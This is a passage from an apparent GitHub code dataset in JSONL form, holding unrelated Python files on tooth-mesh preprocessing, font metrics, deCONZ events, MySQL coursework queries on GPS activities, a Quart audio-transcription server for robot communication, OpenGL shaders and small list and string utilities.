get_graph_feature\nfrom utils import centring\n\n\ndef gen_metadata_inf(cfg: OmegaConf, mesh: vedo.Mesh, device='cuda'):\n mesh = centring(mesh)\n N = mesh.ncells\n points = vedo.vtk2numpy(mesh.polydata().GetPoints().GetData())\n ids = vedo.vtk2numpy(mesh.polydata().GetPolys().GetData()).reshape((N, -1))[:,1:]\n cells = points[ids].reshape(N, 9).astype(dtype='float32')\n normals = vedo.vedo2trimesh(mesh).face_normals\n normals.setflags(write=1)\n barycenters = mesh.cell_centers()\n \n #normalized data\n maxs = points.max(axis=0)\n mins = points.min(axis=0)\n means = points.mean(axis=0)\n stds = points.std(axis=0)\n nmeans = normals.mean(axis=0)\n nstds = normals.std(axis=0)\n\n for i in range(3):\n cells[:, i] = (cells[:, i] - means[i]) / stds[i] #point 1\n cells[:, i+3] = (cells[:, i+3] - means[i]) / stds[i] #point 2\n cells[:, i+6] = (cells[:, i+6] - means[i]) / stds[i] #point 3\n barycenters[:,i] = (barycenters[:,i] - mins[i]) / (maxs[i]-mins[i])\n normals[:,i] = (normals[:,i] - nmeans[i]) / nstds[i]\n\n X = np.column_stack((cells, barycenters, normals))\n X = X.transpose(1, 0)\n\n meta = dict()\n meta[\"cells\"] = torch.from_numpy(X).unsqueeze(0).to(device, dtype=torch.float)\n KG_6 = get_graph_feature(torch.from_numpy(X[9:12, :]).unsqueeze(0), k=6).squeeze(0)\n KG_12 = get_graph_feature(torch.from_numpy(X[9:12, :]).unsqueeze(0), k=12).squeeze(0)\n meta[\"KG_6\"] = KG_6.unsqueeze(0).to(device, dtype=torch.float)\n meta[\"KG_12\"] = KG_12.unsqueeze(0).to(device, dtype=torch.float)\n\n return meta","repo_name":"MAS0NM/tooth_seg","sub_path":"postprocessing.py","file_name":"postprocessing.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"17612533878","text":"import json\nimport re\n\nconfig_file = \"C:\\\\Users\\\\mweas\\\\OneDrive\\\\Documents\\\\code_repos\\\\HexMapBuilderVue\\\\src\\\\assets\\\\hexConfig.json\"\n\n\nwith open(config_file) as f:\n config = json.load(f)\n\nglobalFillLists = config['globalFillLists']\ncontentTags = config['contentTags']\n\nfor category in contentTags.keys():\n for (k, v) in contentTags[category].items():\n print(\">>>>>\", k)\n for description in v['description']:\n if len(re.findall(\"#\\w+\", description['text'])) > 0:\n for match in re.findall(\"#\\w+\", description['text']):\n print(match)\n if len(v[re.sub(\"#\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n if len(re.findall('!\\w+', description['text'])) > 0:\n for match in re.findall(\"!\\w+\", description['text']):\n print(match)\n if len(globalFillLists[re.sub(\"!\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n for hook in v['hook']:\n if len(re.findall('#\\w+', hook['text'])) > 0:\n for match in re.findall(\"#\\w+\", hook['text']):\n print(match)\n if len(v[re.sub(\"#\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n if len(re.findall('!\\w+', hook['text'])) > 0:\n for match in re.findall(\"!\\w+\", hook['text']):\n print(match)\n if len(globalFillLists[re.sub(\"!\", \"\", match)]) == 0:\n print(\"!!!!!!!!!!!!! No entries!\")\n","repo_name":"mgordin/HexMapBuilderVue","sub_path":"src/choiceListChecker.py","file_name":"choiceListChecker.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2672187639","text":"\"\"\"Mange events from deCONZ.\"\"\"\n\nfrom collections.abc import Callable\nimport logging\nfrom typing import TYPE_CHECKING, Any\n\nfrom ..models import ResourceGroup\nfrom ..models.event import Event, EventType\n\nif TYPE_CHECKING:\n from ..gateway import DeconzSession\n\n\nLOGGER = logging.getLogger(__name__)\n\nSubscriptionType = tuple[\n Callable[[Event], None],\n tuple[EventType, ...] | None,\n tuple[ResourceGroup, ...] | None,\n]\nUnsubscribeType = Callable[[], None]\n\n\nclass EventHandler:\n \"\"\"Event handler class.\"\"\"\n\n def __init__(self, gateway: \"DeconzSession\") -> None:\n \"\"\"Initialize API items.\"\"\"\n self.gateway = gateway\n self._subscribers: list[SubscriptionType] = []\n\n def subscribe(\n self,\n callback: Callable[[Event], None],\n event_filter: tuple[EventType, ...] | EventType | None = None,\n resource_filter: tuple[ResourceGroup, ...] | ResourceGroup | None = None,\n ) -> UnsubscribeType:\n \"\"\"Subscribe to events.\n\n \"callback\" - callback function to call when on event.\n Return function to unsubscribe.\n \"\"\"\n if isinstance(event_filter, EventType):\n event_filter = (event_filter,)\n if isinstance(resource_filter, ResourceGroup):\n resource_filter = (resource_filter,)\n\n subscription = (callback, event_filter, resource_filter)\n self._subscribers.append(subscription)\n\n def unsubscribe() -> None:\n self._subscribers.remove(subscription)\n\n return unsubscribe\n\n def handler(self, raw: dict[str, Any]) -> None:\n \"\"\"Receive event from websocket and pass it along to subscribers.\"\"\"\n event = Event.from_dict(raw)\n\n for callback, event_filter, resource_filter in self._subscribers:\n if event_filter is not None and event.type not in event_filter:\n continue\n\n if resource_filter is not None and event.resource not in resource_filter:\n continue\n\n callback(event)\n","repo_name":"Kane610/deconz","sub_path":"pydeconz/interfaces/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"9994281560","text":"from vharfbuzz import Vharfbuzz\nimport uharfbuzz as hb\nfrom fontTools import ttLib\nfrom fontquant.helpers.fontcontent import get_primary_script, get_glyphs_for_script\n\n\nclass CustomHarfbuzz(Vharfbuzz):\n def setup_points_draw_funcs(self, buffer_list):\n def move_to(x, y, buffer_list):\n buffer_list.append((x, y))\n\n def line_to(x, y, buffer_list):\n buffer_list.append((x, y))\n\n def cubic_to(c1x, c1y, c2x, c2y, x, y, buffer_list):\n buffer_list.append((c1x, c1y))\n buffer_list.append((c2x, c2y))\n buffer_list.append((x, y))\n\n def quadratic_to(c1x, c1y, x, y, buffer_list):\n buffer_list.append((c1x, c1y))\n buffer_list.append((x, y))\n\n def close_path(buffer_list):\n pass\n\n self.drawfuncs = hb.DrawFuncs()\n self.drawfuncs.set_move_to_func(move_to)\n self.drawfuncs.set_line_to_func(line_to)\n self.drawfuncs.set_cubic_to_func(cubic_to)\n self.drawfuncs.set_quadratic_to_func(quadratic_to)\n self.drawfuncs.set_close_path_func(close_path)\n\n def glyph_to_points(self, gid):\n if not hasattr(hb, \"DrawFuncs\"):\n raise ValueError(\"glyph_to_points_path requires uharfbuzz with draw function support\")\n\n buffer_list = []\n self.setup_points_draw_funcs(buffer_list)\n self.hbfont.draw_glyph(gid, self.drawfuncs, buffer_list)\n\n return buffer_list\n\n def buf_to_bbox(self, buf):\n x_cursor = 0\n # if \"hhea\" in self.ttfont:\n # # ascender = self.ttfont[\"hhea\"].ascender + 500\n # # descender = self.ttfont[\"hhea\"].descender - 500\n # # fullheight = ascender - descender\n # elif \"OS/2\":\n # ascender = self.ttfont[\"OS/2\"].sTypoAscender + 500\n # descender = self.ttfont[\"OS/2\"].sTypoDescender - 500\n # # fullheight = ascender - descender\n # else:\n # # fullheight = 1500\n # descender = 500\n y_cursor = 0\n\n x_min = None\n x_max = None\n y_min = None\n y_max = None\n\n for info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n # dx, dy = pos.position[0], pos.position[1]\n glyph_path = [(x + x_cursor, y + y_cursor) for x, y in self.glyph_to_points(info.codepoint)]\n for x, y in glyph_path:\n if x_min is None or x < x_min:\n x_min = x\n if x_max is None or x > x_max:\n x_max = x\n if y_min is None or y < y_min:\n y_min = y\n if y_max is None or y > y_max:\n y_max = y\n x_cursor += pos.position[2]\n y_cursor += pos.position[3]\n\n return x_min, x_max, y_min, y_max\n\n def buf_to_width(self, buf):\n x_cursor = 0\n\n for _info, pos in zip(buf.glyph_infos, buf.glyph_positions):\n # dx, dy = pos.position[0], pos.position[1]\n x_cursor += pos.position[2]\n\n return x_cursor\n\n def str(self, string, options=None):\n \"\"\"Return the shaped string buffer as a string.\"\"\"\n buf = self.shape(string, options)\n return self.serialize_buf(buf)\n\n def bbox(self, string, options=None):\n \"\"\"Return the shaped string buffer's bbox.\"\"\"\n buf = self.shape(string, options)\n return self.buf_to_bbox(buf)\n\n\nclass CustomTTFont(ttLib.TTFont):\n def has_feature(self, tag):\n return tag in [FeatureRecord.FeatureTag for FeatureRecord in self[\"GSUB\"].table.FeatureList.FeatureRecord]\n\n def glyphname_for_char(self, char):\n \"\"\"Convert a character to a glyph name.\"\"\"\n cmap = self.getBestCmap()\n if ord(char) in cmap:\n return cmap[ord(char)]\n else:\n return None\n\n def get_primary_script(self):\n \"\"\"Retrieve font's primary script.\"\"\"\n return get_primary_script(self)\n\n def get_glyphs_for_primary_script(self):\n \"\"\"Retrieve list of glyph names of font's primary_script.\"\"\"\n return get_glyphs_for_script(self, self.get_primary_script())\n\n\nclass BaseDataType(object):\n def example_value(self, default_example_value):\n return self.shape_value(default_example_value) or None\n\n def return_value_description(self):\n return None\n\n def shape_value(self, value):\n return value\n\n\nclass Percentage(BaseDataType):\n def example_value(self, default_example_value):\n return self.shape_value(default_example_value) or 0.5\n\n def return_value_description(self):\n return \"Percentage expressed as float 0—1 (e.g. `0.5`)\"\n\n def shape_value(self, value):\n if value is not None:\n return round(value * 1000) / 1000\n else:\n return 0.0\n\n\nclass Boolean(BaseDataType):\n def example_value(self, default_example_value):\n return self.shape_value(default_example_value) or True\n\n def return_value_description(self):\n return \"Boolean (`True`or `False`)\"\n\n\nclass String(BaseDataType):\n def example_value(self, default_example_value):\n return self.shape_value(default_example_value) or \"abc...\"\n\n def return_value_description(self):\n return \"String\"\n\n\nclass Integer(BaseDataType):\n def example_value(self, default_example_value):\n return self.shape_value(default_example_value) or 5\n\n def return_value_description(self):\n return \"Integer number (e.g. `5`)\"\n\n\nclass Metric(object):\n name = None\n keyword = None\n children = []\n interpretation_hint = None\n data_type = None\n example_value = None\n\n def __init__(self, ttFont, vhb, parent=None) -> None:\n self.ttFont = ttFont\n self.vhb = vhb\n self.parent = parent\n\n def shape_value(self, value):\n return self.data_type().shape_value(value)\n\n def find_check(self, path):\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n if instance.path() == path.split(\"/\"):\n return instance\n else:\n found = instance.find_check(path)\n if found:\n return found\n return None\n\n def is_included(self, includes):\n path = \"/\".join(self.path())\n # We are at root\n if path == \"\":\n return True\n if includes:\n for include in includes:\n include_root = include.split(\"/\")[0]\n path_root = path.split(\"/\")[0]\n # We are category root\n if include_root == path_root == path:\n return True\n # We are normal metric\n elif path.startswith(include):\n return True\n return False\n else:\n return True\n\n def is_excluded(self, excludes):\n path = \"/\".join(self.path())\n # We are at root\n if path == \"\":\n return False\n if excludes:\n for exclude in excludes:\n exclude_root = exclude.split(\"/\")[0]\n path_root = path.split(\"/\")[0]\n # We are category root\n if exclude_root == path_root == path:\n return True\n # We are normal metric\n elif path.startswith(exclude):\n return True\n return False\n else:\n return False\n\n def value(self, includes=None, excludes=None):\n dictionary = {}\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n if instance.is_included(includes) and not instance.is_excluded(excludes):\n dictionary[instance.keyword] = instance.value(includes, excludes)\n elif not includes and not excludes:\n dictionary[instance.keyword] = instance.value(includes, excludes)\n\n return dictionary\n\n def path(self):\n if self.parent:\n return self.parent.path() + [self.keyword]\n else:\n return [self.keyword] if self.keyword else []\n\n def base(self):\n if self.parent:\n return self.parent.base()\n else:\n return self\n\n def link_list(self):\n if self.__doc__:\n link = \"/\".join(self.path()).replace(\"/\", \"\").replace(\" \", \"-\")\n return [f' * [{self.name}](#{self.name.lower().replace(\" \", \"-\")}-{link})']\n else:\n check_list = []\n if self.name:\n check_list.append(\"* \" + self.name + \":\")\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n new_list = instance.link_list()\n if new_list:\n check_list += new_list\n return check_list\n\n def index(self):\n if self.__doc__:\n return \"/\".join(self.path()), self.name\n else:\n check_list = []\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n new_list = instance.index()\n if new_list:\n check_list += new_list\n return check_list\n\n def documentation(self):\n join_sequence = '\"][\"'\n\n if self.__doc__:\n markdown = f\"\"\"\\\n### {self.name} (`{\"/\".join(self.path())}`)\n\n{\" \".join([line.strip() for line in self.__doc__.splitlines()])}\n\"\"\"\n if self.interpretation_hint:\n markdown += \"\\n_Interpretation Hint:_ \" + (\n \" \".join([line.strip() for line in self.interpretation_hint.splitlines()]) + \"\\n\\n\"\n )\n\n if self.data_type:\n markdown += f\"\"\"\\n_Return Value:_ {self.data_type().return_value_description()}\n\n_Example:_\n```python\nfrom fontquant import quantify\nresults = quantify(\"path/to/font.ttf\")\nvalue = results[\"{join_sequence.join(self.path())}\"][\"value\"]\nprint(value)\n>>> {self.data_type().example_value(self.example_value)}\n```\n\n\"\"\"\n\n return markdown\n\n else:\n markdown = \"\"\n\n if self.name:\n markdown += f\"## {self.name}\\n\\n\"\n\n for child in self.children:\n instance = child(self.ttFont, self.vhb, parent=self)\n markdown += instance.documentation()\n return markdown\n\n\nfrom .casing import Casing # noqa E402 (Circular import)\nfrom .numerals import Numerals # noqa E402 (Circular import)\nfrom .appearance import Appearance # noqa E402 (Circular import)\n\n\nclass Base(Metric):\n children = [Casing, Numerals, Appearance]\n\n\ndef quantify(font_path, includes=None, excludes=None):\n ttFont = CustomTTFont(font_path)\n vhb = CustomHarfbuzz(font_path)\n\n base = Base(ttFont, vhb)\n return base.value(includes, excludes)\n","repo_name":"googlefonts/fontquant","sub_path":"Lib/fontquant/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":10827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"28057346414","text":"from DbConnector import DbConnector\nfrom haversine import haversine\nfrom tabulate import tabulate\nimport datetime\n\nclass Queries:\n def __init__(self):\n self.connection = DbConnector()\n self.db_connection = self.connection.db_connection\n self.cursor = self.connection.cursor\n\n def q1(self):\n tables = [\"Activity\", \"TrackPoint\", \"User\"]\n for table in tables:\n query = \"SELECT COUNT(id) FROM {}\".format(table)\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n nr = rows[0][0]\n print(\"There are {} entries in the {} table\".format(nr, table))\n\n def q2(self):\n query_activities = \"SELECT COUNT(id) FROM Activity\"\n query_users = \"SELECT COUNT(id) FROM User\"\n\n self.cursor.execute(query_activities)\n count_activities = self.cursor.fetchall()\n\n self.cursor.execute(query_users)\n count_users = self.cursor.fetchall()\n\n avg = count_activities[0][0] / count_users[0][0]\n print(\"The average number of activites per user is: {}\".format(round(avg, 0), float))\n\n def q3(self):\n \"\"\"Find the top 20 users with the highest number of activities\"\"\"\n query = \"SELECT user_id, COUNT(*) AS Activities FROM Activity GROUP BY user_id ORDER BY Activities DESC LIMIT 20\"\n self.cursor.execute(query)\n user_ids = self.cursor.fetchall()\n print(\"The following users have the highest number of activities\")\n print(tabulate(user_ids, headers=self.cursor.column_names))\n\n\n def q4(self):\n query = \"SELECT DISTINCT user_id FROM Activity \" \\\n \"WHERE transportation_mode='taxi'\"\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n print(\"The following users have taken a taxi:\")\n print(tabulate(rows, headers=self.cursor.column_names))\n\n def q5(self):\n query = \"SELECT COUNT(id), transportation_mode FROM Activity GROUP BY transportation_mode\"\n\n self.cursor.execute(query)\n rows = self.cursor.fetchall()\n\n print(tabulate(rows, headers=self.cursor.column_names))\n\n def q6(self):\n \"\"\"Find the year with the most activities\"\"\"\n years_activities = {}\n years_hours = {}\n\n for year in range(2007, 2011):\n query_a = \"SELECT COUNT(*) FROM Activity WHERE start_date_time LIKE '{}%'\".format(year)\n self.cursor.execute(query_a)\n number_of_activities = self.cursor.fetchall()[0]\n years_activities[number_of_activities] = year\n\n query_b = \"SELECT SUM(TIMESTAMPDIFF(HOUR, end_date_time, start_date_time)) FROM Activity WHERE start_date_time LIKE '{}%'\".format(year)\n self.cursor.execute(query_b)\n number_of_activities = self.cursor.fetchall()[0]\n years_hours[number_of_activities] = year\n\n highest_no_of_activities = max(years_activities.keys())\n year = years_activities[highest_no_of_activities]\n print(\"The year with the most activities is \" + str(year))\n\n most_hours = max(years_hours.keys())\n year = years_hours[most_hours]\n print(\"The year with the most hours of activities is \" + str(year))\n\n\n def q7(self):\n query = \"SELECT id FROM Activity \" \\\n \"WHERE user_id='112' AND transportation_mode='walk' AND \" \\\n \"(YEAR(start_date_time)=2008 OR YEAR(end_date_time)=2008)\"\n self.cursor.execute(query)\n activities = [result[0] for result in self.cursor.fetchall()]\n\n total_distance = 0\n for activity in activities:\n query = \"SELECT lat,lon FROM TrackPoint WHERE activity_id={} AND YEAR(date_time)=2008 ORDER BY date_time\".format(activity)\n self.cursor.execute(query)\n coordinates = self.cursor.fetchall()\n for i in range(len(coordinates)-1):\n coord1 = coordinates[i]\n coord2 = coordinates[i+1]\n dist = haversine(coord1, coord2)\n total_distance += dist\n\n print(\"user 112 walked a total of {} km in 2008\".format(round(total_distance,2)))\n\n def q8(self):\n query = \"SELECT Activity.user_id, SUM(TP1.altitude - (\" \\\n \"SELECT altitude FROM TrackPoint TP2 \" \\\n \"WHERE TP2.id = TP1.id - 1 AND TP2.altitude < TP1.altitude AND TP2.activity_id = TP1.activity_id \" \\\n \"ORDER BY id LIMIT 1)) altitude \" \\\n \"FROM TrackPoint TP1 JOIN Activity ON TP1.activity_id = Activity.id WHERE TP1.altitude != -777 AND altitude > 0 GROUP BY Activity.user_id ORDER BY altitude DESC LIMIT 20\"\n\n self.cursor.execute(query)\n altitudes = self.cursor.fetchall()\n\n for i in range(len(altitudes)):\n if altitudes[i][1] is None:\n continue\n altitudes[i] = (altitudes[i][0], float(altitudes[i][1]) * 0.3048)\n\n print(\"Top 20 users with meters gained in total altitude\")\n print(tabulate(altitudes, headers=self.cursor.column_names))\n\n def q9(self):\n \"\"\"Find all users who have invalid activities, and the number of invalid activities per user\"\"\"\n\n time = \"SET @timestamp='0000-00-00 00:00:00'\"\n activity_id = \"SET @activity_id = 0\"\n self.cursor.execute(time)\n self.cursor.execute(activity_id)\n\n query = \"SELECT tabell.user_id AS User, COUNT(DISTINCT tabell.current_id) AS 'Number of invalid Activities' \" \\\n \"FROM (SELECT user_id, @timestamp previous_timestamp, @timestamp:=date_time curr_timestamp, @activity_id previous_id, @activity_id:=Activity.id current_id \" \\\n \"FROM Activity JOIN TrackPoint ON (Activity.id = TrackPoint.activity_id)) AS tabell \" \\\n \"WHERE (TIMESTAMPDIFF(MINUTE, tabell.previous_timestamp, tabell.curr_timestamp) > 5 AND (tabell.current_id = tabell.previous_id))\" \\\n \"GROUP BY User\"\n\n\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n\n print(tabulate(results, headers=self.cursor.column_names))\n\n def q10(self):\n # coordinates of the forbidden city. Round down to two decimals to get matches.\n lat = round(39.916, 2)\n lon = round(116.397, 2)\n\n query = \"SELECT DISTINCT user_id from Activity \" \\\n \"JOIN TrackPoint ON Activity.id=TrackPoint.activity_id \" \\\n \"WHERE ROUND(lat,2)={} AND ROUND(lon,2)={}\".format(lat, lon)\n self.cursor.execute(query)\n users = [entry[0] for entry in self.cursor.fetchall()]\n print(\"The following users have tracked an activity in the Forbidden City:\", users)\n\n def q11(self):\n query = \"SELECT user_id, transportation_mode as most_used_transportation_mode, MAX(count1) as count \" \\\n \"FROM (SELECT user_id, transportation_mode, COUNT(*) AS count1 FROM Activity GROUP BY user_id, transportation_mode) as a1 \" \\\n \"GROUP BY user_id, transportation_mode \" \\\n \"ORDER BY user_id, count DESC\" \\\n\n self.cursor.execute(query)\n results = self.cursor.fetchall()\n\n filtered_results = []\n user_id = 0\n for i in range(len(results)):\n # when duplicates, takes the one that is ranked on top my the sql query\n if user_id == results[i][0]:\n continue\n\n else:\n user_id = results[i][0]\n filtered_results.append((results[i][0], results[i][1]))\n\n print(tabulate(filtered_results, headers=self.cursor.column_names))\n\ndef main():\n program = None\n try:\n program = Queries()\n print(\"QUESTIONS:\")\n print(\"\\nQuestion 1: \")\n program.q1()\n print(\"\\nQuestion 2: \")\n program.q2()\n print(\"\\nQuestion 3: \")\n program.q3()\n print(\"\\nQuestion 4: \")\n program.q4()\n print(\"\\nQuestion 5: \")\n program.q5()\n print(\"\\nQuestion 6: \")\n program.q6()\n print(\"\\nQuestion 7: \")\n program.q7()\n print(\"\\nQuestion 8: \")\n program.q8()\n print(\"\\nQuestion 9: \")\n program.q9()\n print(\"\\nQuestion 10: \")\n program.q10()\n print(\"\\nQuestion 11: \")\n program.q11()\n except Exception as e:\n print(\"ERROR: failed to use database:\", e)\n finally:\n if program:\n program.connection.close_connection()\n\nif __name__ == '__main__':\n main()\n","repo_name":"jonryf/TDT4225-Exercise2","sub_path":"Queries.py","file_name":"Queries.py","file_ext":"py","file_size_in_byte":8411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6016379566","text":"# посчитать количество каждой из букв в строке\n\ndef strcounter(s):\n symbols_counter = {}\n for symbol in s:\n symbols_counter[symbol] = symbols_counter.get(symbol, 0) + 1\n\n return symbols_counter\n\n\nfor key, value in strcounter('aaaabbbbbuuuudsfsfsdf').items():\n print(f'{key}: {value}')\n\n\"\"\"HOMEWORK\"\"\"\n\n\ndef palindrome(s):\n \"\"\"\n Полученная на входе строка переворачивается и сравнивается с исходной,\n если они равны, то возвращается True, иначе - False\n :param s: str\n :return: True or False\n \"\"\"\n return True if s == s[::-1] else False\n\n\nprint(palindrome('лепсспел'))\nprint(palindrome('helloworld'))\n","repo_name":"AndreyBry/MaximumTest","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29900475308","text":"#\n# A minimalist set of codes to regulate output verbosity for publicsensors sampling codes\n#\n# Use vrb_setlevel to set the global parameter \"verbosity_level\". Thereafter, arguments\n# of vrb_print will be printed to the REPL iff the parameter \"level\"<=verbosity_level.\n#\n# verbosity _level is set in default_params and user_params in public_sensors code; change\n# those settings to modulate terminal output.\n#\n# verbosity_dict is a dictionary than enables descriptive in addition to numerical settings.\n\nglobal verbosity_level, verbosity_dict\nverbosity_level=5\nverbosity_dict={'base':2,'low':5,'med':10,'high':15}\n\ndef vrb_setlevel(*args):\n # Called with no arguments, returns verbosity level\n # Called with one argument, sets it as the verbosity level\n global verbosity_level\n if len(args)==0:\n print('Verbosity level: ',verbosity_level)\n else:\n if isinstance(args[0],int) or isinstance(args[0],float):\n verbosity_level=args[0]\n elif isinstance(args[0],str):\n try:\n verbosity_level=verbosity_dict[args[0]]\n except:\n print('Verbosity error: verbosity_level in vrb_print must be a number or in ',list(verbosity_dict.keys()))\n verbosity_level = verbosity_dict['base']\n \n \ndef vrb_print(*args,level='med'):\n global verbosity_level\n if isinstance(level,int) or isinstance(level,float):\n plevel=level\n elif isinstance(level,str):\n try:\n plevel=verbosity_dict[level]\n except:\n print('Verbosity error: level in vrb_print must be a number or in ',list(verbosity_dict.keys()))\n plevel = verbosity_dict['base']\n if plevel<=verbosity_level:\n for a in args:\n print(a)\n \n","repo_name":"publicsensors/MicrocontrollerKits","sub_path":"Sensors/SetUp/verbosity.py","file_name":"verbosity.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73680745706","text":"import os\nimport logging\nfrom quart import Quart\nimport asyncio\nfrom dotenv import load_dotenv\nfrom manager import AudioManager\nimport blueprints\nfrom robocomm import handle_plc_connection\n\n\nload_dotenv()\n# if PLC_HOST is unset, then the server will not attempt to communicate with any robots/plcs\nPLC_HOST = os.getenv(\"PLC_HOST\")\nPLC_PORT = os.getenv(\"PLC_PORT\", \"9999\")\nUPLOAD_FOLDER = os.getenv(\"UPLOAD_FOLDER\", \"servaudiofiles\")\nALLOWED_EXTENSIONS = os.getenv(\"ALLOWED_EXTENSIONS\", \"mp3,3gp,mov,m4a\")\nMODEL = os.getenv(\"MODEL\", \"base.en\")\nWORKERS = os.getenv(\"WORKERS\", \"1\")\nUSE_CPU = os.getenv(\"USE_CPU\", \"True\")\nPORT = os.getenv(\"PORT\", \"5000\")\nDEMO_MODE = os.getenv(\"DEMO_MODE\", \"False\")\n\n\nlog = logging.getLogger(\"server.main\")\n\n\ndef _setup_logging(debug=False):\n \"\"\"sets up the server logger\"\"\"\n level = logging.DEBUG if debug else logging.INFO\n ch = logging.StreamHandler()\n formatter = logging.Formatter(\"[%(asctime)s %(levelname)s %(name)s] %(message)s\")\n ch.setFormatter(formatter)\n log = logging.getLogger(\"server\")\n log.setLevel(level)\n log.addHandler(ch)\n\n\ndef main():\n _setup_logging(debug=True)\n \n app = Quart(__name__)\n app.config[\"UPLOAD_FOLDER\"] = UPLOAD_FOLDER\n app.config[\"ALLOWED_EXTENSIONS\"] = set(ALLOWED_EXTENSIONS.split(\",\"))\n app.config[\"MODEL\"] = MODEL\n app.config[\"WORKERS\"] = int(WORKERS)\n app.config[\"USE_CPU\"] = USE_CPU.lower() in [\"true\", \"yes\"]\n app.config[\"DEMO_MODE\"] = DEMO_MODE.lower() in [\"true\", \"yes\"]\n app.config[\"MANAGER\"] = AudioManager(\n app.config[\"MODEL\"],\n app.config[\"UPLOAD_FOLDER\"],\n app.config[\"WORKERS\"],\n app.config[\"USE_CPU\"],\n )\n app.config[\"DIAGNOSTIC_QUEUE\"] = asyncio.Queue()\n app.config[\"RESPONSE_QUEUE\"] = asyncio.Queue()\n app.config[\"PORT\"] = PORT\n app.config[\"PLC_HOST\"] = PLC_HOST\n app.config[\"PLC_PORT\"] = int(PLC_PORT)\n app.register_blueprint(blueprints.main)\n \n @app.before_serving\n async def startup():\n if app.config[\"PLC_HOST\"] is not None:\n loop = asyncio.get_event_loop()\n log.debug(f\"creating server for PLC on port {PLC_PORT}\")\n app.config[\"CONNECTION\"] = await asyncio.start_server(\n lambda r, w: handle_plc_connection(app.config[\"DIAGNOSTIC_QUEUE\"], app.config[\"RESPONSE_QUEUE\"], r, w),\n host=\"127.0.0.1\",\n port=app.config[\"PLC_PORT\"]\n )\n # loop.create_task(app.config[\"CONNECTION\"])\n else:\n app.config[\"CONNECTION\"] = None\n \n app.run()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aeasy370/Chatting-With-a-Robot","sub_path":"Server/server/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"31551064688","text":"\"\"\"\r\n Helper function for compiling and linking shaders\r\n\"\"\"\r\n\r\nfrom OpenGL.GL.shaders import compileProgram, compileShader\r\nfrom OpenGL.GL import GL_VERTEX_SHADER, GL_FRAGMENT_SHADER\r\n\r\ndef create_shader(filepath) -> int:\r\n \"\"\"\r\n reads source code for the given filepath (both .vert and .frag files),\r\n compiles and links. Allocates memory, the created shader must be destroyed.\r\n\r\n Parameters:\r\n \r\n filepath: the file to read. everything up the file extension\r\n \r\n Returns:\r\n The index of the created shader.\r\n \"\"\"\r\n\r\n with open(f\"{filepath}.vert\", \"r\") as f:\r\n vertex_src = f.readlines()\r\n \r\n with open(f\"{filepath}.frag\", \"r\") as f:\r\n fragment_src = f.readlines()\r\n \r\n return compileProgram(\r\n compileShader(vertex_src, GL_VERTEX_SHADER),\r\n compileShader(fragment_src, GL_FRAGMENT_SHADER)\r\n )","repo_name":"amengede/dogstone","sub_path":"src/shader_functions.py","file_name":"shader_functions.py","file_ext":"py","file_size_in_byte":919,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2595022366","text":"#listThings.py\r\n#Will Schick\r\n#4/17/2018\r\n\r\n\r\n##Returns the product of all the elements in the list or 1 if the list is empty.\r\ndef product(values):\r\n i = 0\r\n product = 1\r\n \r\n #Loop through the indicies and produce a product\r\n while i < len(values):\r\n #body\r\n product = product * values[i]\r\n \r\n #Update\r\n i = i + 1\r\n \r\n return product\r\n\r\n\r\n##Returns the number of odd numbers in the list. Does not alter the list.\r\ndef countOdds(values):\r\n #setup\r\n i = 0\r\n oddCount = 0\r\n \r\n #Loop through the indicies and count the amount of odds\r\n while i < len(values):\r\n #Body\r\n if (values[i] % 2) == 1: #If the remainder is 1, AKA if it's odd\r\n oddCount = oddCount + 1 #Add to the odd count\r\n \r\n #Update\r\n i = i + 1\r\n \r\n #return\r\n return oddCount\r\n\r\n\r\n##Returns a new list containing the squares of each value in the original list.\r\ndef squares(values):\r\n #setup\r\n i = 0\r\n newList = [] #Create a new list\r\n \r\n #Loop through the indicies and append their squares to the new list\r\n while i < len(values):\r\n #Body\r\n newList.append(values[i]*values[i])\r\n #Update\r\n i = i + 1\r\n \r\n #return\r\n return newList\r\n\r\n\r\n##Computes and returns the alternating sum of the integer elements in the list.\r\ndef computeAltSum(values):\r\n i = 0\r\n altSum = 0\r\n subtracting = False\r\n \r\n #Loop through the indicies, alternating between addition and subtraction to a sum\r\n while i < len(values):\r\n #Body\r\n if subtracting == True:\r\n altSum = altSum - values[i]\r\n subtracting = False\r\n else:\r\n altSum = altSum + values[i]\r\n subtracting = True\r\n \r\n #update\r\n i = i + 1\r\n \r\n #Return\r\n return altSum\r\n\r\n\r\n##Alters the list by replacing each negative value in the list to 0. \r\ndef replaceNegatives(values):\r\n i = 0 \r\n 